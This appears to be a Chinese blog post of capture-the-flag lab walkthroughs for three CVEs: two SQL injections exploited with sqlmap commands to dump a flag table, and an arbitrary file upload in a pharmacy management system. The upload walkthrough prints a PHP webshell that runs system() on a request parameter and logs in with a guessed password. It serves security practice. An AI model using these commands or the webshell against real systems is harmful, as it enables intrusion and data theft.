当前位置: 首页 > news >正文

shaushaushau1

CVE-2023-7130

靶标介绍:

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.

已经告诉你在哪里存在sql注入了,一般上来应该先目录扫描再进行判断,看是否存在sql注入,这里就直接进行注入

抓包

保存到5.txt中

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D notes --tables

sqlmap -r 5.txt -batch -D notes -T flllaaaag --columns

sqlmap -r 5.txt -batch -D notes -T flllaaaag -C flag --dump

CVE-2023-48864

靶标介绍:

SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。

存在sql注入

进行目录扫描

dirsearch -u http://    -e*

一一访问后,来到install/安装导向

127.0.0.1

semcms

root

root

安装后会来到日志页面

日志里面有后台地址,登录账号和密码

登录

在产品管理页面随便勾选,选择批量上架,抓包,保存为5.txt

经过测试后发现参数languageID并不是注入点,后面的AID才是注入的点

存在时间盲注,注入点是参数AID

有这四个数据库,爆semcms数据库,得表

可以看到flllaaaag表

得到

CVE-2022-30887

靶标介绍:

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

 目录扫描后什么都没有

判断应该是需要登录进去,但是邮箱不容易爆破,发现最底下Mayurik可以点击,访问

当在最下面点击那些下载按钮后会访问,接着会弹出一个邮箱

mayuri.infospace@gmail.com

密码尝试mayurik,成功登录进去

找到上传界面,上传一句话木马

上传成功

 访问该网页后返回config.php页面

说明上传成功,且可以执行

连接蚁剑

连接后全是木马文件,还是不死马,点击一下就复制一份

正常情况下是可以直接访问flag的

尝试官方的POC

POC

上传的木马内容

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?> 

上传成功

进行get传参

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • matlab实现模拟退火算法
  • 软考-软件设计师(程序设计语言习题)
  • 苹果上架没有iphone、没有ipad也可以生成截屏
  • python编程练习1-数组
  • 【内网】服务器升级nginx1.17.0
  • HarmonyOS 地图服务:深度解析其丰富功能与精准导航实力
  • TCP和UDP编程的学习
  • 【python】灰色预测 GM(1,1) 模型
  • Coze插件发布!PDF转Markdown功能便捷集成,打造你的专属智能体
  • 使用PCF8591实现一个串口控制电压表
  • 第三期书生大模型实战营 进阶岛第3关LMDeploy 量化部署进阶实践
  • Eclipse的使用配置教程:必要设置、创建工程及可能遇到的问题(很详细,很全面,能解决90%的问题)
  • 开发小运维-jar包服务shell启动脚本
  • 提升职业竞争力,亚马逊云科技认证助你云端腾飞
  • 第1节 安装Flask
  • 【391天】每日项目总结系列128(2018.03.03)
  • 【JavaScript】通过闭包创建具有私有属性的实例对象
  • 【MySQL经典案例分析】 Waiting for table metadata lock
  • 【从零开始安装kubernetes-1.7.3】2.flannel、docker以及Harbor的配置以及作用
  • Android开源项目规范总结
  • angular学习第一篇-----环境搭建
  • JavaScript 无符号位移运算符 三个大于号 的使用方法
  • Java应用性能调优
  • Kibana配置logstash,报表一体化
  • Median of Two Sorted Arrays
  • mysql常用命令汇总
  • vue2.0项目引入element-ui
  • 技术:超级实用的电脑小技巧
  • 深度学习在携程攻略社区的应用
  • 算法-插入排序
  • 携程小程序初体验
  • kubernetes资源对象--ingress
  • 正则表达式-基础知识Review
  • 智能情侣枕Pillow Talk,倾听彼此的心跳
  • ###项目技术发展史
  • #【QT 5 调试软件后,发布相关:软件生成exe文件 + 文件打包】
  • #NOIP 2014#day.2 T1 无限网络发射器选址
  • (2)nginx 安装、启停
  • (5)STL算法之复制
  • (十八)用JAVA编写MP3解码器——迷你播放器
  • (四)软件性能测试
  • (小白学Java)Java简介和基本配置
  • (一)为什么要选择C++
  • (源码分析)springsecurity认证授权
  • (转)Java socket中关闭IO流后,发生什么事?(以关闭输出流为例) .
  • (转载)VS2010/MFC编程入门之三十四(菜单:VS2010菜单资源详解)
  • (轉貼) 資訊相關科系畢業的學生,未來會是什麼樣子?(Misc)
  • .【机器学习】隐马尔可夫模型(Hidden Markov Model,HMM)
  • .form文件_一篇文章学会文件上传
  • .NET 6 在已知拓扑路径的情况下使用 Dijkstra,A*算法搜索最短路径
  • .net 7和core版 SignalR
  • .net 8 发布了,试下微软最近强推的MAUI
  • .Net Web项目创建比较不错的参考文章
  • .Net(C#)常用转换byte转uint32、byte转float等
  • .NET面试题(二)